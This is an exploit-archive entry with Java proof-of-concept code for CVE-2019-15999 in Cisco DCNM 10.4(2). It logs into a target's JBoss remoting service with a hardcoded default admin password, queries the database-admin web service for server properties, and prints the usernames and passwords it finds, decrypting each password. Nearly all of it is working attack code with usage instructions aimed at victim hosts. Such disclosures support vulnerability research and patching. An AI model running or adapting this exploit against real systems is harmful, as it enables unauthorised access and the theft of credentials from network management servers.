# Exploit Title: Cisco DCNM JBoss 10.4 - Credential Leakage # Date: 2020-01-06 # Exploit Author: Harrison Neal # Vendor Homepage: https://www.cisco.com/ # Software Link: https://software.cisco.com/download/home/281722751/type/282088134/release/10.4(2) # Version: 10.4(2) # CVE: CVE-2019-15999 # You'll need a few .jars from a copy of Cisco DCNM to compile and run this code # To compile, file path should match ${package}/${class}.java, e.g., # com/whatdidibreak/dcnm_expl/Main.java # Usage: java -jar PackagedJarFile Victim1IpOrFqdn [victim2 ...] package com.whatdidibreak.dcnm_expl; import com.cisco.dcbu.jaxws.san.ep.DbAdminSEI; import com.cisco.dcbu.jaxws.wo.DBRowDO; import com.cisco.dcbu.lib.util.jboss_4_2.JBoss_4_2Encrypter; import java.util.Properties; import javax.naming.Context; import javax.naming.InitialContext; public class Main { public static void main(String[] args) throws Throwable { for (String target : args) { System.out.println("Target: " + target); Properties jndiProps = new Properties(); jndiProps.put(Context.INITIAL_CONTEXT_FACTORY, "org.jboss.naming.remote.client.InitialContextFactory"); jndiProps.put(Context.PROVIDER_URL, "remote://" + target + ":4447"); jndiProps.put(Context.SECURITY_PRINCIPAL, "admin"); jndiProps.put(Context.SECURITY_CREDENTIALS, "nbv_12345"); jndiProps.put("jboss.naming.client.ejb.context", true); Context ctx = new InitialContext(jndiProps); DbAdminSEI i = (DbAdminSEI) ctx.lookup("dcm/jaxws-dbadmin/DbAdminWS!com.cisco.dcbu.jaxws.san.ep.DbAdminSEI"); for (DBRowDO row : i.getServerProperties(null).getRows()) { String propName = row.getEntry()[0]; String propValue = row.getEntry()[1]; if (propValue.isEmpty()) { continue; } if (propName.contains("user")) { System.out.println(propName + " = " + propValue); } else if (propName.contains("pass")) { System.out.println(propName + " = " + propValue + " (" + JBoss_4_2Encrypter.decrypt(propValue) + ")"); } } System.out.println(); } } }